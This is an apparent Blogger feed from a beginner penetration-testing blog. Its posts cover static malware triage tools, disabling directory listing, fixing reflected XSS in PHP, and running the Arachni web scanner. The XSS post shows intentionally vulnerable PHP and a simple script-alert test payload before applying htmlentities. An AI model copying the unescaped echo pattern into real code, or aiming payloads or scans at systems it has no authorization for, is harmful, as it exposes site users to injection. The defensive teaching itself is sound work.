tag:blogger.com,1999:blog-76517098611704178182024-03-06T01:12:39.384-08:00Sudhir @ PentesterThis Blog is about Penetration Testing with Tools and manually for starters & System Tips and Tricks.sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.comBlogger16125tag:blogger.com,1999:blog-7651709861170417818.post-69545584262390551782012-05-22T06:29:00.004-07:002012-05-22T06:29:44.951-07:00Basic Information Gathering of Analysis on Malware (Part 1)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: justify;">
<b>Basic Information Gathering of Analysis on Malware</b> (<b>Part 1</b>)</div>
<div style="text-align: justify;">
--------------------------------------------------------------------</div>
<div style="text-align: justify;">
Malware (spyware, rootkits, worms, trojans, viruses, etc.) is malicious software designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The first thing most people do when a system is infected is scan it with antivirus and anti-malware software. This tutorial shows how to analyse the sample itself and work out its functionality.</div>
<div style="text-align: justify;">
The first step here is basic information gathering for malware analysis; it is the starting point, and you go deeper depending on the complexity of the malware.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
There are two types of analysis, static and dynamic.</div>
<div style="text-align: justify;">
<b>Static: analyzing the code or structure of the program.</b></div>
<div style="text-align: justify;">
<b>Dynamic: actually running the program to see what it does.</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Note:</div>
<div style="text-align: justify;">
-----</div>
<div style="text-align: justify;">
<b>This tutorial does not cover the advanced part of analyzing malware or disassembly. If my study progresses to the advanced topics, they will be posted here first... :)</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
note 2:</div>
<div style="text-align: justify;">
-------</div>
<div style="text-align: justify;">
<b>First go through the PE (Portable Executable) file format and structure. Basically, the PE format contains the information the Windows OS loader needs.</b></div>
<div style="text-align: justify;">
<b>For analysis we need to concentrate on the PE file header, which includes information about the code, the type of application, the required library functions, and space requirements. Also learn about DLLs and their functions (imported and exported functions).</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Basic info Gathering of Static Analysis:</b></div>
<div style="text-align: justify;">
----------------------------------------</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Now let's take a malware sample...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
or create a trojan yourself.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Malware is uniquely identified by a hash. The malicious file is run through a hashing program, and the resulting hash identifies the sample.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
To fingerprint it we use a tool called md5deep; there are other tools as well.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Usage: md5deep 123.exe (the malware file name).</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf3BAyPYZ_KMe97htcXSF_QAcDiTY1uChxKg3_p9oQylKMte0A1fUOUe32ecqBIpYrIIA7Oki5if4c26AJFVasnOtnsU7UGwCRNDJcdcSNuY9ideGT8SJWJ5vrQe6OqMw1rPxdikc_74Q/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf3BAyPYZ_KMe97htcXSF_QAcDiTY1uChxKg3_p9oQylKMte0A1fUOUe32ecqBIpYrIIA7Oki5if4c26AJFVasnOtnsU7UGwCRNDJcdcSNuY9ideGT8SJWJ5vrQe6OqMw1rPxdikc_74Q/s640/1.PNG" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In the above screenshot you see a hash; this hash can be used to search online to see whether the sample has already been identified.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Now here comes the problem: you don't know whether the malware is packed or not. When it is packed, it becomes difficult to analyse or detect.</div>
<div style="text-align: justify;">
It is normally packed with some kind of wrapper program. To identify which packer this malware has been packed with, we use a tool called...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>PEiD</b></div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh1L8wDKj1_poGPkZdxLUSsvg0EdVXTxd-MsRNTB3IeQUxASpMOSd0BseHIaFzQANIqf4T0DQnK8gCmCs3TuXucSKiyOwr6D_7y6f2BgghmnxzdNlMZijcfxjnvnLiwhFE_cJI5hBXv_w/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh1L8wDKj1_poGPkZdxLUSsvg0EdVXTxd-MsRNTB3IeQUxASpMOSd0BseHIaFzQANIqf4T0DQnK8gCmCs3TuXucSKiyOwr6D_7y6f2BgghmnxzdNlMZijcfxjnvnLiwhFE_cJI5hBXv_w/s400/2.PNG" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
From this we can see it is packed with the UPX packer.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
To unpack it there is a program called upx (available on sourceforge.net).</div>
<div style="text-align: justify;">
Unpack usage: upx -d filename.exe</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxdonPR-QINShOK40Hi418mVDeqSDfxrtDYlliCyGvHGSZakYvm6R3JRSNvG_yTeNe4mF6cSZW5K81YN-zGNYZj9oha2p0k-O6Ouy9eND3M3Qh1ZMu0BY7jEdaxAAcT7HLVUSycMllJT0/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxdonPR-QINShOK40Hi418mVDeqSDfxrtDYlliCyGvHGSZakYvm6R3JRSNvG_yTeNe4mF6cSZW5K81YN-zGNYZj9oha2p0k-O6Ouy9eND3M3Qh1ZMu0BY7jEdaxAAcT7HLVUSycMllJT0/s640/3.PNG" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Now it has been unpacked.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The next step is to see what kind of linked functions (loaded DLLs) it is using.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We have a tool called Dependency Walker. Load the file in it (see below).</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVcZb45OlTvzxd082Xjwb0l_bQ81tOV88DdGlEMstfegbZBZHcURbBCRICPbu_bE8w4DrAmSQ6hUDXccIgasmgCgjJ3mMbSQVTcbgDlCt9raXsLNgBvKeGcJHcUiIqL2h13Cg9xy4l_qQ/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVcZb45OlTvzxd082Xjwb0l_bQ81tOV88DdGlEMstfegbZBZHcURbBCRICPbu_bE8w4DrAmSQ6hUDXccIgasmgCgjJ3mMbSQVTcbgDlCt9raXsLNgBvKeGcJHcUiIqL2h13Cg9xy4l_qQ/s640/4.PNG" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
1.) Here in the right pane you can observe many DLLs; these are the DLLs the executable imports.</div>
<div style="text-align: justify;">
2.) Imported functions.</div>
<div style="text-align: justify;">
3.) When malware imports a function by ordinal, you can find which function is being imported by looking at the ordinal value.</div>
<div style="text-align: justify;">
4.) Additional information about the DLLs that would be loaded if you run the program.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A common trojan or keylogger will import interesting DLLs and functions such as:</div>
<div style="text-align: justify;">
<br /></div>
<table>
<tr><th>Kernel32.dll (functions)</th><th>user32.dll (functions)</th></tr>
<tr><td>CreateFileW</td><td>SetWindowsHookExW</td></tr>
<tr><td>FindFirstFileW</td><td>RegisterClassExW</td></tr>
<tr><td>FindNextFileW</td><td>RegisterHotKey</td></tr>
<tr><td>etc.</td><td>SetWindowTextW</td></tr>
<tr><td></td><td>etc.</td></tr>
</table>
<div style="text-align: justify;">
Other DLLs of interest: GDI32.dll, Shell32.dll, Advapi32.dll, etc.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<ul>
<li>Kernel32 tells us the software can create and manipulate processes. The FindFirstFile and FindNextFile functions above are interesting because they can search through directories.</li>
<li>User32.dll has functions like SetWindowsHookEx, which is commonly used in spyware and keyloggers.</li>
<li>GDI32 is for graphics, so the program probably has a GUI.</li>
<li>Shell32 can launch other programs.</li>
<li>Advapi32 uses the registry.</li>
</ul>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
As mentioned above, we now take a look at the PE headers.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A PE file has sections like:</div>
<div style="text-align: justify;">
.text (contains executable code), .rdata (holds read-only data), .data (global data used throughout the program), .rsrc (resources needed by the executable),</div>
<div style="text-align: justify;">
.idata (stores import function information; if not present it will be in .rdata), .reloc (information for relocation of library files), etc.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We have a tool called PEview (see below).</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXUFQYQtx8PTM3TqCSxwLiqR-j_dcubmbax7gzNXg4vdLyZl4fTvksIvJRDerewnqIhFrxgx_DOO8W6fDSF6Y94_RWSPhAeb-ezGJ4azpyq_ryS97HknQORSVgx-YlXIJ5qW08m3mAjNM/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXUFQYQtx8PTM3TqCSxwLiqR-j_dcubmbax7gzNXg4vdLyZl4fTvksIvJRDerewnqIhFrxgx_DOO8W6fDSF6Y94_RWSPhAeb-ezGJ4azpyq_ryS97HknQORSVgx-YlXIJ5qW08m3mAjNM/s640/5.PNG" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
You can observe the machine info and the time stamp of when it was compiled, which is useful.</div>
<div style="text-align: justify;">
We can ignore the DOS_Header and the signature.</div>
<div style="text-align: justify;">
Image_Optional_Header includes important information and has the Subsystem field, which shows whether it is a console or GUI program.</div>
<div style="text-align: justify;">
Image_Section_Header also contains important info; these entries describe each section in the PE file. Section names can be consistent from one exe to another.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyruOG2_dwhEVaabY1Uwbldw6B9fAUEN3P90ykWPth8okHk-i6eRH_SGsvo66mJSPZQw2jWl-7nKiJ9bVPQaFeJhC_u0eYplhevmXN3qj22AOw4AApOh06OqC3VUy7ZWkdaOXuYQR8K24/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyruOG2_dwhEVaabY1Uwbldw6B9fAUEN3P90ykWPth8okHk-i6eRH_SGsvo66mJSPZQw2jWl-7nKiJ9bVPQaFeJhC_u0eYplhevmXN3qj22AOw4AApOh06OqC3VUy7ZWkdaOXuYQR8K24/s640/6.PNG" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Here one thing you can observe about the .data section is that its virtual size is much larger than its raw data size (you can ignore a small difference).</div>
<div style="text-align: justify;">
This alone will not tell us it is suspicious; it is likely unpacked.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>{{ To be continued with basic info gathering for Dynamic Analysis, soon. }}</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com7tag:blogger.com,1999:blog-7651709861170417818.post-71666173399563676262012-05-16T05:38:00.003-07:002012-05-16T05:38:43.909-07:00Disable Directory Listing<div dir="ltr" style="text-align: left;" trbidi="on">
You often observe directory listing on many websites:<br />
<br />
Ex: www.demo.com/<br />
<br />
By traversing directories, e.g. trying <b>www.demo.com/images/</b>,<br />
an attacker may look for hidden directories, and there is a possibility<br />
of finding web config files too.<br />
<br />
To disable this:<br />
<br />
<b>In Apache:</b><br />
<b>---------------</b><br />
Open the file called httpd.conf<br />
<br />
and search for:<br />
<b><br /></b><br />
<b>Options Indexes FollowSymLinks </b><br />
<b><br /></b><br />
Now just add a '-' before Indexes, like:<br />
<br />
<b>Options -Indexes FollowSymLinks</b>
<br />
<b><br /></b><br />
<br />
<b>In IIS 7:</b><br />
<b>----------</b><br />
Open IIS Manager and navigate to the site or level you want to manage.<br />
Then in the "<b>Features View</b>", double-click "<b>Directory Browsing</b>".<br />
<br />
In <b> " Actions " </b>pane click <b>Disable </b>if directory browsing is enabled.</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com2tag:blogger.com,1999:blog-7651709861170417818.post-32091723990130037422012-04-22T23:11:00.003-07:002012-04-29T23:38:50.985-07:00Preventing XSS (PHP)<div dir="ltr" style="text-align: left;" trbidi="on">
Lets take an example :<br />
<br />
<br />
<html><br />
<br />
<body><br />
<br />
<form action="xss.php" method="POST"><br />
<br />
Val: <input type="text" name="val"><br />
<input type="submit" name="valu" value="submit"><br />
</form><br />
</body><br />
</html><br />
<br />
<?php<br />
<br />
$val=$_POST['val'];<br />
if ($_POST['valu']=='submit')<br />
{<br />
echo $val;<br />
}<br />
?><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Here you can see that when we enter a value it is directly echoed back to us; see below:<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihvCJc_D_RmK9YQwLLKTrTQJJBoo9as75dgyJwddgwJoNJGKKkbUiAhiFckHgmF1BKqy9swkYm3VvQQxgjaNZs55DqvUQ9aWPf70CKN5ixo_we5tYH4X3h1o5VS4DM5xB6bbiZLoy12dM/s1600/xss1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihvCJc_D_RmK9YQwLLKTrTQJJBoo9as75dgyJwddgwJoNJGKKkbUiAhiFckHgmF1BKqy9swkYm3VvQQxgjaNZs55DqvUQ9aWPf70CKN5ixo_we5tYH4X3h1o5VS4DM5xB6bbiZLoy12dM/s320/xss1.PNG" width="320" /></a>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
And when I enter the HTML code below, it is rendered as markup.<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh19zW2txM952VN8CEjdxZsYSuOnAsQkjbgidqBteRrGQP8ZgtRy3ILemBOfiLDefkd17PGJr0ZvhbC4dxkkSVtJZ2jezEuRghNzGeUsC0MLKksKgKNDKDVcUu1xPGqCQd1THtFBujGM0o/s1600/xss2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="53" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh19zW2txM952VN8CEjdxZsYSuOnAsQkjbgidqBteRrGQP8ZgtRy3ILemBOfiLDefkd17PGJr0ZvhbC4dxkkSVtJZ2jezEuRghNzGeUsC0MLKksKgKNDKDVcUu1xPGqCQd1THtFBujGM0o/s400/xss2.PNG" width="400" /></a>
<br />
<br />
From this we know that HTML is rendered, so let's now try running JavaScript:<br />
<script>alert("xss")</script><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMTGTN0mQM8SPhVJmavTDXgU313QHELOifasf0OJsKQFolsNx24qsrH4UeO8py4ZTTu0yo2GQQYVlOA7vq_2u1nr74fPnOdMvH4om-FWWxMx6NWZffZJZCfLzlM4l9AZeounxDlQYByWI/s1600/xss3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMTGTN0mQM8SPhVJmavTDXgU313QHELOifasf0OJsKQFolsNx24qsrH4UeO8py4ZTTu0yo2GQQYVlOA7vq_2u1nr74fPnOdMvH4om-FWWxMx6NWZffZJZCfLzlM4l9AZeounxDlQYByWI/s400/xss3.PNG" width="400" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To prevent this we use the PHP function <b>htmlentities</b>.<br />
<br />
Now the code becomes:<br />
<br />
<br />
<?php<br />
<br />
$val=htmlentities($_POST['val'],ENT_QUOTES,'UTF-8');<br />
if ($_POST['valu']=='submit')<br />
{<br />
echo $val;<br />
}<br />
?><br />
<div>
<br /></div>
<div>
Now try running the script again: it does not get executed. :)</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk3ZcyG26p5Cf66xTqyaXZb9FZt5LY7EG03I6SIJakNJ0fX9bu-EA_zwtyVURQFastTA31FmMvESBG7jCb-8_No3JjBNYpUi7uaNoSPd80g7VfRCi1GVfDjZRF-4CvUCa6oWbR2wKoKA0/s1600/xss4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk3ZcyG26p5Cf66xTqyaXZb9FZt5LY7EG03I6SIJakNJ0fX9bu-EA_zwtyVURQFastTA31FmMvESBG7jCb-8_No3JjBNYpUi7uaNoSPd80g7VfRCi1GVfDjZRF-4CvUCa6oWbR2wKoKA0/s1600/xss4.PNG" /></a></div>
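<div>
The same before-and-after in Python (an added example, not the post's PHP): html.escape with quote=True plays the role of htmlentities($v, ENT_QUOTES, 'UTF-8'), and an HTML parser is used as the check, listing the tags a browser would create from the response so the unsafe and safe versions can be compared without a browser.</div>

```python
import html
from html.parser import HTMLParser

# Constructed input: the payload the post submits through the form.
PAYLOAD = '<script>alert("xss")</script>'


def escape_like_htmlentities(value):
    """Python counterpart of htmlentities($v, ENT_QUOTES, 'UTF-8') for the
    characters that matter for HTML injection: ampersand, angle brackets
    and both quote characters."""
    return html.escape(value, quote=True)


def render_unsafe(val):
    """Mirrors the first PHP snippet: echo $val; with no encoding."""
    return "<html><body>Val: " + val + "</body></html>"


def render_safe(val):
    """Mirrors the fixed snippet: the value is encoded before it is echoed."""
    return "<html><body>Val: " + escape_like_htmlentities(val) + "</body></html>"


class TagCollector(HTMLParser):
    """Records every start tag a browser would create from the response."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(page):
    """Start tags in the response that the template itself did not emit;
    anything listed here came from user input, so the reflection is live."""
    collector = TagCollector()
    collector.feed(page)
    collector.close()
    return [t for t in collector.tags if t not in ("html", "body")]


if __name__ == "__main__":
    print(injected_tags(render_unsafe(PAYLOAD)))   # ['script']
    print(injected_tags(render_safe(PAYLOAD)))     # []
```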
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
cheers!..
</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.webweaver.nu/clipart/img/nature/dogs/dog-cartoon.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.webweaver.nu/clipart/img/nature/dogs/dog-cartoon.gif" /></a></div>
<div>
<br /></div>
<br /></div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com5tag:blogger.com,1999:blog-7651709861170417818.post-88366746708399578142012-01-09T21:45:00.001-08:002012-01-10T03:26:03.243-08:00Arachni Web scanner (CLI & WEB GUI)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Download the CDE package from:<br />
<br />
<a href="https://github.com/Zapotek/arachni/downloads">https://github.com/Zapotek/arachni/downloads</a> <br />
<br />
<br />
Linux users enjoy the privilege of a CDE package which is a compressed
archive and contains a full preconfigured Linux environment in the form
of a sandbox.<br />
<br />
Quick Basic Usage of Arachni:<br />
<br />
To see help type :<br />
<br />
<br />
<pre><code>$ arachni -h</code></pre>
<br />
You can check the options here.<br />
<br />
<br />
<br />
You can simply run Arachni like:<br />
<br />
<pre><code>$ arachni http://test.com</code></pre>
which will load all modules, the plugins under <code>/plugins/defaults</code>, and audit all forms, links and cookies.<br />
<br />
In the following example all modules will be run against <i>http://site.com</i>, auditing links/forms/cookies and following subdomains, with verbose output enabled.<br />
<br />
The results of the audit will be saved in the file <i>site.com.afr</i>.<br />
<br />
<pre><code>$ arachni -fv http://site.com --report=afr:outfile=site.com.afr</code></pre>
You can load modules selectively with the following commands, using wildcards:<br />
<br />
<br />
To load all <i>xss</i> modules using a wildcard:<br />
<br />
<pre><code>$ arachni http://example.net --mods=xss_*</code></pre>
<br />
To load all <i>audit</i> modules using a wildcard:<br />
<pre><code>$ arachni http://example.net --mods=audit*</code></pre>
<br />
To exclude only the <i>csrf</i> module:<br />
<pre><code>$ arachni http://example.net --mods=*,-csrf</code></pre>
<br />
Or you can mix and match; to run everything but the <i>xss</i> modules:<br />
<pre><code>$ arachni http://example.net --mods=*,-xss_*</code></pre>
<h4>
<u>Performing a full scan quickly</u></h4>
The <i>full </i>profile adds header auditing to the defaults.<br />
<br />
You can use it like:<br />
<pre><code>$ arachni --load-profile=profiles/full.afp http://site.net</code></pre>
<br />
<b><span style="font-size: large;">You have lots of options/flags/modes to explore here based on your usage.</span></b><br />
<br />
<br />
For example, there is a Debug mode:<br />
<br />
<br />
When this flag is enabled the system will output a lot of messages detailing what's happening internally.<br />
If you don't want to be flooded by annoying and obscure messages you can pipe the debugging output to a separate file when running Arachni, using:<br />
<pre><code>$ arachni -pv --mods=xss http://localhost/~zapotek/tests/forms/xss.php --debug</code></pre>
The debug.log file will contain something like:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1tYlQvhhisq_LErR6P0xrBbvyREL1Et_71o1bsFjomoIH4jskmzULvBhk1Kb3ged0b4mgUR1R2-MTlybf63nqo2eHANTJoNhCS2RmDkp1I7ZbDqZMpqocK8cd-AQoS2fmVpaCZKqiWY8/s1600/1212.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="363" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1tYlQvhhisq_LErR6P0xrBbvyREL1Et_71o1bsFjomoIH4jskmzULvBhk1Kb3ged0b4mgUR1R2-MTlybf63nqo2eHANTJoNhCS2RmDkp1I7ZbDqZMpqocK8cd-AQoS2fmVpaCZKqiWY8/s400/1212.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixW0KSulp0hl3yrXjtViNmgWKdIgm_-khZLezzbmpikHoDUEfgJwh41RZY5XDJyNIVkrb6oVtfqLdUtpjUQVHQBDhfOE7LN2OzAgR9gBSHKE4rOF4HzN2XoiUD5ATIs4KwR0yKwBr8pKQ/s1600/1213.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixW0KSulp0hl3yrXjtViNmgWKdIgm_-khZLezzbmpikHoDUEfgJwh41RZY5XDJyNIVkrb6oVtfqLdUtpjUQVHQBDhfOE7LN2OzAgR9gBSHKE4rOF4HzN2XoiUD5ATIs4KwR0yKwBr8pKQ/s400/1213.PNG" width="400" /></a></div>
<br />
<u><span style="font-size: x-large;">Arachni WEB UI</span></u><br />
<br />
Unzip the package and go to the folder; there you will find the Arachni console and the web UI.<br />
<br />
There are two ways to start WEB UI :<br />
<br />
Just type at the shell prompt:<br />
<pre><code>$ arachni_web_autostart</code></pre>
<br />
<br />
This will set up a local Dispatcher and the WebUI server, and even open your browser.<br />
<br />
or<br />
<br />
<br />
Start a Dispatcher like:<br />
<pre><code>$ arachni_rpcd</code></pre>
Then start the WebUI by running:<br />
<pre><code>$ arachni_web</code></pre>
<b>And finally open up a browser window and visit: http://localhost:4567/</b><br />
<br />
The WebUI supports <span class="caps">HTTP</span> Basic auth, which you can configure with a Username and Password.<br />
<div style="text-align: justify;">
The WebUI can serve many purposes ranging from just a simple way to use Arachni to a Grid construction and management interface.</div>
<div>
</div>
<div style="text-align: justify;">
You can use it to perform and monitor a single scan, hassle-free, via
any web-browser enabled device or use it to setup a worldwide High
Performance Grid of Arachni scanners ready to combine their resources in
order to perform lightning fast audits.</div>
The first page, eloquently entitled ‘Start a scan’, allows you to do just that.<br />
<br />
A single scan can be performed easily enough, you just select a Dispatcher, enter the <span class="caps">URL</span> of your target and hit ‘Launch Scan’.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://a248.e.akamai.net/assets.github.com/img/a6ecb23f1f82da44a1c0d717a4222b15a7e8555b/687474703a2f2f7a61706f74656b2e6769746875622e636f6d2f61726163686e692f77696b692f696d616765732f73696d706c655f7363616e2e706e67" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="102" src="https://a248.e.akamai.net/assets.github.com/img/a6ecb23f1f82da44a1c0d717a4222b15a7e8555b/687474703a2f2f7a61706f74656b2e6769746875622e636f6d2f61726163686e692f77696b692f696d616765732f73696d706c655f7363616e2e706e67" width="400" /></a></div>
<br />
<br />
<div style="text-align: justify;">
A high performance scan utilizes more than one Arachni Instance to perform the audit.</div>
<div style="text-align: justify;">
<br />
The master instance will perform the crawl and then calculate and distribute the workload amongst its slaves.<br />
This allows scan time to be greatly decreased.</div>
<br />
Once you have set up a Grid (i.e. configured at least 2 Dispatchers
to have each other as neighbours) the “Start a scan” screen will change
to this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://a248.e.akamai.net/assets.github.com/img/7fd8141d35b54d85bdf5456d0997244f4eafdf6e/687474703a2f2f7a61706f74656b2e6769746875622e636f6d2f61726163686e692f77696b692f696d616765732f6870675f7363616e5f636865636b626f782e706e67" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="121" src="https://a248.e.akamai.net/assets.github.com/img/7fd8141d35b54d85bdf5456d0997244f4eafdf6e/687474703a2f2f7a61706f74656b2e6769746875622e636f6d2f61726163686e692f77696b692f696d616765732f6870675f7363616e5f636865636b626f782e706e67" width="400" /></a></div>
<br />
<br />
<h2 style="color: black;">
<u>Modules and Plug-ins</u></h2>
The <i>Modules</i> and <i>Plug-ins</i> pages are pretty self-explanatory, they simply allow you to select which components to load.<br />
<h2>
<u>Settings</u></h2>
Nothing special; these options have the same effects as their <span class="caps">CLI</span> (Command Line Interface) counterparts.<br />
<h2>
<u>Reports</u></h2>
This page contains a list of audit reports along with the option to convert them to a fair amount of different formats. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://a248.e.akamai.net/assets.github.com/img/78dbc74942de12ab69cfd37454af12b087963f7a/687474703a2f2f7a61706f74656b2e6769746875622e636f6d2f61726163686e692f77696b692f696d616765732f7265706f7274732e706e67" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="84" src="https://a248.e.akamai.net/assets.github.com/img/78dbc74942de12ab69cfd37454af12b087963f7a/687474703a2f2f7a61706f74656b2e6769746875622e636f6d2f61726163686e692f77696b692f696d616765732f7265706f7274732e706e67" width="640" /></a></div>
<br />
<br />
<h2>
<u>Log</u></h2>
Not much to add to this, the name says it all:<br />
<img height="219" src="https://a248.e.akamai.net/assets.github.com/img/b7b0d7aea7a0eaced6082ddb34b71e08bbcef142/687474703a2f2f7a61706f74656b2e6769746875622e636f6d2f61726163686e692f77696b692f696d616765732f6c6f672e706e67" width="640" /><br />
<br />
<h1>
<u>Shutdown</u></h1>
You can kill the WebUI by sending <i>Ctrl+C</i> to the console from which you started it.<br />
<br />
:)...:)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtzXx_OBYTBNWnI_Dv68yYzxjulA8RBfGVy-TY5d89pDbVGKPx8rNQgE-NCaJ22SLHaNrnY1bMTi4ao_ZVC8b51-fq0qKo_km8n-IXC6BKATqYgEnjAtGm8o-16PaB4t2Lrw8VKLa4Y9o/s1600/dog.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtzXx_OBYTBNWnI_Dv68yYzxjulA8RBfGVy-TY5d89pDbVGKPx8rNQgE-NCaJ22SLHaNrnY1bMTi4ao_ZVC8b51-fq0qKo_km8n-IXC6BKATqYgEnjAtGm8o-16PaB4t2Lrw8VKLa4Y9o/s1600/dog.jpg" /></a></div>
<br />
